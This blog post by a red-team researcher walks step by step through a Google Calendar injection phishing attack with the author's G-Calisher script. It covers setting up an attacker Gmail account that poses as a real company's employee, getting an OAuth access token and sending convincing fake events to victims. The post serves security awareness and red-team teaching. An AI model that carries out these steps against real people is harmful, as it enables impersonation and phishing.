It was Halloween, October 31 2018 and Black Hills Security Researchers, Beau Bullock and Michael Felch disclosed to Google, step-by-step as to how anyone with a gmail account could add an event, as “accepted” to any Google Calendar via the Google Calendar API. Bullock and Felch also published a blog post that explains this attack in detail.
I gave a talk on this topic at the Texas Cyber Summit on Saturday, 10/12/2019 entitled “Gone Calishing: A Red Team Approach to weaponizing Google Calendar and How to Stop It,” where I show exactly how to conduct this attack using my script called G-Calisher. My script is basically the python version of Bullock and Felch’s Invoke-InjectGEventAPI module from their MailSniper PowerShell script.
I have been asked for the slides, but since I will be giving this talk at two other upcoming conferences I decided to write this Medium post instead. In this post I will simply give the step-by-step instructions for conducting this attack using my G-Calisher tool.
Step 1: Create a new gmail account or login to your current gmail account.
This will be your attacker account (who is originating the calendar event) somake it work for your operation. If I’m pretending to be Tom Jones from carbon black for example email@example.com. Make sure you know the cover company’s email structure to look as legitimate as possible.
- Create/select a Project and agree to ToS and continue
- Create a new project or select one that you already have
- Click “continue”
- Agree to the terms and service in the popup
- Choose your country and click “Agree and Continue”
Step 3: Name your project and click “create”
Step 4: Click “Go to Credentials”
Step 5: On the “Add credentials to your project” page click “cancel”
Step 6: On the left of the page Select the “OAuth consent screen” tab.
Step 7: On the OAuth consent page select an Email address, enter a Product name if not already set, and click the Save button.
Step 8: Select the Credentials tab
- Click the “Create credentials” button and…
… select OAuth client ID.
Step 9: Select the application type Web application, under “Authorized redirect URIs”
- paste in the following address: https://developers.google.com/oauthplayground
- Then, click the Create button.
Step 10: From the popup, copy your “Client ID” and “Client Secret”
Step 11: Navigate here: https://developers.google.com/oauthplayground/
- Click the gear in the upper right-hand corner
Step 12: — Enter the OAuth2 client ID and OAuth2 client secret in the boxes.
- check the box to “Use your own OAuth credentials”
- Make sure that “OAuth flow” is set to Server-side
- And “Access Type” is set to offline.
- Click close
Step 13: Back over on the left hand side of the OAuth Playground screen
- Select the “Calendar API v3” dropdown
- and click both URLs to add them to scope.
- Click Authorize APIs
Step 14: Select the account you want to authorize, then click Allow.
- This is going to be the attacker email address that you just created or logged into
If there is an error such as “Error: redirect urimismatch” then it’s possible the changes haven’t propagated yet. Just wait a few minutes, hit the back button and try to authorize again.)
Step 15: You should now be at “Step 2: Exchange authorization code for tokens.”
- Click the “Exchange authorization code for tokens button”.
- The “Access token” is the item we need for accessing the API.
- Copy the value of the “Access token.”
That is all of the steps to take in order to get the API Access Token needed to do an API Calendar Injection.
Now all you need to do is use G-Calisher to send your calendar injection to the email addresses of your victim(s).
First, you will need to clone the G-Calisher github repo:
Then install the python requests library using pip:
pip install requests
Here is an example from the injection I sent at the Texas Cyber Summit:
I recommend taking a look at the usage statement for the script, which you can read from the Terminal, or from the github page. This will break down the mandatory and optional parameters for you. The above screenshot uses all of the mandatory parameters as well as the two optional parameters for “Title” and “Description.” I recommend using those two optional parameters so that your event does not look odd on the receiver’s end.
Thanks to everyone who came out to my talk at the Texas Cyber Summit and thanks for all of the slide requests. I hope that these instructions will hold you over until I am done giving my talks and can post the slides.
I will be speaking at ToorCon 2019 at The Point in Mission Bay, in San Diego, CA. 8–10 NOV 2019. https://sandiego.toorcon.net/
Hackfest 2019 in Quebec City, Canada 1–2 NOV 2019. https://hackfest.ca/en/
I will post the slides soon.
Much Love… 4n7m4n